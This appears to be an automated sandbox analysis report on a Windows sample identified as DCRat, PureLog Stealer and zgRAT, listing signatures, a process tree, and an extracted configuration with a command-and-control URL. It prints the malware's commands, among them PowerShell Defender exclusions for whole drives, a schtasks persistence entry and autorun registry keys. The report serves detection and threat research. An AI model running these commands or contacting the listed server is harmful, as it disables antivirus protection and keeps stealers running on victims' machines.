Windows Analysis Report
9XHFe6y4Dj.exe

Overview

General Information

Sample name:9XHFe6y4Dj.exe
renamed because original name is a hash value
Original sample name:8213A9C837181823A4D58728637EAEB5.exe
Analysis ID:1538177
MD5:8213a9c837181823a4d58728637eaeb5
SHA1:f574eec251d1695589c1e0e00ae167dfb39216ec
SHA256:68129b517bc27ae2ad742008a7deb67cc9c85209665f73c8fea955c52f1ef33e
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 9XHFe6y4Dj.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
    • csc.exe (PID: 528 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 4400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9645.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCBECAF1EB4DD4ACB9C3DAD38B7F1421.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 1564 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 2820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7148 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES97EB.tmp" "c:\Windows\System32\CSC6D484021F1A3499F944D7EA066CF3EF7.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • schtasks.exe (PID: 432 cmdline: schtasks.exe /create /tn "9XHFe6y4Dj9" /sc MINUTE /mo 8 /tr "'C:\Users\user\Desktop\9XHFe6y4Dj.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • powershell.exe (PID: 7136 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6208 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4720 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 432 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7156 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7324 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7344 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7376 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7400 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7424 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7436 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6496 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7472 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7504 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7524 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\9XHFe6y4Dj.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8156 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lE7emhVBWP.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 8808 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 9104 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • 9XHFe6y4Dj.exe (PID: 8812 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 2360 cmdline: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 3480 cmdline: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 8320 cmdline: C:\Users\user\Desktop\9XHFe6y4Dj.exe MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 8628 cmdline: C:\Users\user\Desktop\9XHFe6y4Dj.exe MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 3372 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • svchost.exe (PID: 7876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 7484 cmdline: "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • 9XHFe6y4Dj.exe (PID: 5160 cmdline: "C:\Users\user\Desktop\9XHFe6y4Dj.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • tqeRXJHxPWPPoiNqjJeEYdv.exe (PID: 1268 cmdline: "C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe" MD5: 8213A9C837181823A4D58728637EAEB5)
  • cleanup
{"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-dVH10D4cdJAzs948YjfF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
Source | Rule | Description | Author | Strings
9XHFe6y4Dj.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
9XHFe6y4Dj.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000000.2087739498.0000000000682000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 9XHFe6y4Dj.exe PID: 6400 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
Process Memory Space: 9XHFe6y4Dj.exe PID: 8812 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
0.0.9XHFe6y4Dj.exe.680000.0.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
0.0.9XHFe6y4Dj.exe.680000.0.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

                            System Summary

                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ProcessId: 1564, TargetFilename: c:\Windows\System32\SecurityHealthSystray.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tqeRXJHxPWPPoiNqjJeEYdv
                            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files (x86)\windows mail\tqeRXJHxPWPPoiNqjJeEYdv.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", ProcessId: 528, ProcessName: csc.exe
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ProcessId: 6400, TargetFilename: C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 7136, ProcessName: powershell.exe
                            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7876, ProcessName: svchost.exe

                            Data Obfuscation

                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\9XHFe6y4Dj.exe", ParentImage: C:\Users\user\Desktop\9XHFe6y4Dj.exe, ParentProcessId: 6400, ParentProcessName: 9XHFe6y4Dj.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.cmdline", ProcessId: 528, ProcessName: csc.exe
                            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                            2024-10-20T18:17:54.870250+0200 | 2048095 | 1 | A Network Trojan was detected | 192.168.2.5 | 49772 | 188.114.96.3 | 80 | TCP

                            AV Detection

                            Source: 9XHFe6y4Dj.exe Avira: detected
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Avira: detection malicious, Label: HEUR/AGEN.1339906
                            Source: 00000000.00000002.2374859245.0000000012E9A000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: DCRat {"C2 url": "http://733812cm.n9shteam.in/DefaultWordpress", "MUTEX": "DCR_MUTEX-dVH10D4cdJAzs948YjfF", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe ReversingLabs: Detection: 65%
                            Source: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe ReversingLabs: Detection: 65%
                            Source: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe ReversingLabs: Detection: 65%
                            Source: C:\Users\user\Desktop\FcMrvptI.log ReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\GzkiCFwe.log ReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\MlnyqaSB.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\OoZhLKXw.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\QZUgHzbG.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\RORqBBDl.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\VNlekvqu.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\ZInvrbgn.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\aZffRVgZ.log ReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\cmFWEbPY.log ReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\fXkmLoaR.log ReversingLabs: Detection: 29%
                            Source: C:\Users\user\Desktop\koiTwEAQ.log ReversingLabs: Detection: 50%
                            Source: C:\Users\user\Desktop\ohiUtZsx.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\qhLtZjFE.log ReversingLabs: Detection: 20%
                            Source: C:\Users\user\Desktop\wQQSSdrw.log ReversingLabs: Detection: 70%
                            Source: C:\Users\user\Desktop\zKTiJdVm.log ReversingLabs: Detection: 29%
                            Source: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe ReversingLabs: Detection: 65%
                            Source: 9XHFe6y4Dj.exe ReversingLabs: Detection: 65%
                            Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Joe Sandbox ML: detected
                            Source: C:\Program Files (x86)\Windows Mail\tqeRXJHxPWPPoiNqjJeEYdv.exe Joe Sandbox ML: detected
                            Source: 9XHFe6y4Dj.exe Joe Sandbox ML: detected
                            Source: 9XHFe6y4Dj.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Windows Defender\Platform\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Windows Defender\Platform\bd46efcfcb9ccc
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Uninstall Information\tqeRXJHxPWPPoiNqjJeEYdv.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe Directory created: C:\Program Files\Uninstall Information\bd46efcfcb9ccc
                            Source: 9XHFe6y4Dj.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\hbljmznv\hbljmznv.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: 8C:\Users\user\AppData\Local\Temp\tmiybkuk\tmiybkuk.pdb source: 9XHFe6y4Dj.exe, 00000000.00000002.2210751988.000000000351C000.00000004.00000800.00020000.00000000.sdmp

                            Spreading

                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\Documents\desktop.ini
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData\Local\Temp
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\AppData\Local
                            Source: C:\Users\user\Desktop\9XHFe6y4Dj.exe File opened: C:\Users\user\Desktop\desktop.ini

                            Networking

                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49772 -> 188.114.96.3:80
                            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
